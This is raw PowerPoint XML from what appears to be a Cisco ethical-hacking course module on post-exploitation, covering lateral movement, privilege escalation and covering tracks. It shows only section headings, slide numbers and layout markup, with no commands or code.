          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F7021451-1387-4CA6-816F-3879F97B5CBC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9373684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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.3: Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F7021451-1387-4CA6-816F-3879F97B5CBC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41997184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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.3: Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F7021451-1387-4CA6-816F-3879F97B5CBC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1052586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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.3: Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F7021451-1387-4CA6-816F-3879F97B5CBC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3023528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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.3: Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.4: Practice - Post Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F7021451-1387-4CA6-816F-3879F97B5CBC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15815774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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.5: Post-Exploitation Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F7021451-1387-4CA6-816F-3879F97B5CBC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417680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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.5: Post-Exploitation Privilege Escalation (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.6: Practice - Post Exploitation Privilege Escalation </a:t>
            </a:r>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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38266324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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.7: How to Cover Your Tracks</a:t>
            </a:r>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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="572680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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.7: How to Cover Your Tracks (Cont.)</a:t>
            </a:r>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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4032647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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.7: How to Cover Your Tracks (Cont.)</a:t>
            </a:r>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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10146264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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.7: How to Cover Your Tracks (Cont.)</a:t>
            </a:r>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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="381119077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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.7: How to Cover Your Tracks (Cont.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.8: Practice - Steganography</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F7021451-1387-4CA6-816F-3879F97B5CBC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7198049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8: Performing Post-Exploitation Techniques
8.3: Performing Post-Exploitation Techniques Summary
</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F7021451-1387-4CA6-816F-3879F97B5CBC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>58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8: Performing Post-Exploitation Techniques</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.3: Performing Post-Exploitation Techniques Summary
8.3.1: What Did I Learn in this Module?
</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR">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59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3663531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71357516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Performing Post-Exploitation Techniques</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.3: Performing Post-Exploitation Techniques Summary</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.3.1: What Did I Learn in this Module? (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F7021451-1387-4CA6-816F-3879F97B5CBC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>60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Performing Post-Exploitation Techniques</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.3: Performing Post-Exploitation Techniques Summary</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.3.1: What Did I Learn in this Module? (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F7021451-1387-4CA6-816F-3879F97B5CBC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28837331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Performing Post-Exploitation Techniques</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.3: Performing Post-Exploitation Techniques Summary</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.3.2: Reflection Questions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.3.3: Quiz – Performing Post-Exploitation Techniques</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:b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62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20632815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8: Performing Post-Exploitation Techniques</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.3: Performing Post-Exploitation Techniques Summary
Terms and Commands
</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR">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63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5: Exploiting Wired and Wireless Networks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>5.3: Exploiting Wired and Wireless Networks  Summary
Terms and Commands (Cont.)
</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F7021451-1387-4CA6-816F-3879F97B5CBC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1225626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Ethical Hacker
Module 8: Perform Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">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3482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8: Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="B1E8FA"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="B1E8FA"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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543050"/>
            <a:ext cx="6400800" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AFE8FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="AFE8FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>(custom placeholder text!)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>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a:solidFill>
                  <a:srgbClr val="AFE8FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>(custom placeholder text!)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 0" descr="C:/Users/ahungerf/git/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543050"/>
            <a:ext cx="6400800" cy="2571750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AFE8FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4200">
                <a:solidFill>
                  <a:srgbClr val="AFE8FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>(custom placeholder text!)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>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a:solidFill>
                  <a:srgbClr val="AFE8FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>(custom placeholder text!)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 0" descr="C:/Users/ahungerf/git/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NST_INTRO">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="FFFFFF"/>
        </a:solid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a:solidFill>
                  <a:srgbClr val="024C69"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>(custom placeholder text!)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4629150"/>
            <a:ext cx="7772400" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="600">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>© 2023  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cisco and/or its affiliates. All rights reserved.   Cisco Confidential</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 0" descr="C:/Users/ahungerf/git/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
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="00394F"/>
        </a:solid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057400"/>
            <a:ext cx="8229600" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B1E8FA"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
